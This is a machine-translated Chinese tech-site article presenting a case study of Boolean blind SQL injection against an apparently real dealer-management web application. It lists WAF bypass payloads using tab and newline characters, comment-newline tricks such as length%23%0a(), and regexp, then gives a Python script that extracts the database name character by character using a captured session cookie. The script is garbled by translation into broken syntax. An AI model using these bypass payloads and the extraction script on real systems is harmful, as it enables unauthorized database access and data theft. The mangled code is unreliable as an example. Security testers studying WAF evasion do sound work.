Shulou(Shulou.com)06/01 Report--

This article introduces how to analyze the bypass case study of SQL. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

1. A Boolean injection point is found in the test. The test process is as follows:

1. Original request

2. Enter 'or'1'like'1

3. Enter 'or'1'like'2

4. Initially determine the existence of Boolean sql blind injection, and then start to judge the length of the library name:

5. First of all, think of the possibility of dealing with spaces, and do a simple manual test:

6. Find:

Space or (no intercept)

Or space (intercept)

Or/**/ (interception)

Or%09 0a 0d (no intercept)

2. Characters under simple fuzz:

1. Or (even number ~) can also be bypass

2. Odd ~ execution failed:

3. Obtain the length of the library name:

4. If it is intercepted, guess whether the length () or database () function is handled, and simply try:

5. Length () has been disposed of, fuzz:

6. Use comment newline combinations such as length%23%0a () to bypass:

7. The error is still reported here. After a simple test, you can change the space bar to solve the problem:

8. Continue to determine the length of the library name:

9. Database () has also been disposed of, and the same method can be bypassed:

10. Finally, the length of the database is 7, as shown below:

11. Get the library name

12. Substr is not intercepted. Run with the help of intruder:

Note that the first character is l

Write a script and drag the full library name:

Import requests

Payloads = 'abcdefghijklmnopqrstuvwxyz_-'database =' for l in range (1meme 8): for payload in payloads: burp0_url = "https://xxxxxx.xxxxxxxx.com:443/dms.web/manage/rest/basedata/DutyRecord?sort=EMPLOYEE_NO&order=asc&limit=10&offset=0®isterDate=2020-08-19'or%09substr(database%23%0a(),{0}, 1)% 3d' {1}'% 09or'1'like'2&employeeNo=0222&onDutyTime=08%3A00&offDutyTime=17%3A00&usableWorkingHours=9.0&dms_table=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D&dmsFuncId=15100070&_=1597802235462 ".format (LME payload) burp0_cookies = {" JSESSIONID ":" ABCWB37FFE3DB54BD5705453E681E41F2 "," selectDealerCode ":" xxxx " "selectusername": "xxxx", "language": "zh_CN"} burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0 "," Accept ":" application/json, text/javascript, * / *; qroom0.01 "," Accept-Language ":" zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en " Qroom0.2 "," Accept-Encoding ":" gzip, deflate "," Content-Type ":" application/json "," X-Requested-With ":" XMLHttpRequest "," Connection ":" close "," Referer ":" https://xxxxxx.yxxxxuxuxo.xxm/dms.web/html/index.html"} resp = requests.get (burp0_url, headers=burp0_headers) Cookies=burp0_cookies) if "2018-10-22" in resp.content: database + = payload print'[*] success\ t' + database else: print'[*] dumping.'print'[*] current database is:\ t' + database

With the help of regexp regular matching can also be achieved, payload:

'% 20or%0adatabase%23%0a () regexp'%5el'%09or%09'2'like'1

Successfully noted the first character: l, and so on.

This is the end of the bypass case study on how to parse SQL. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.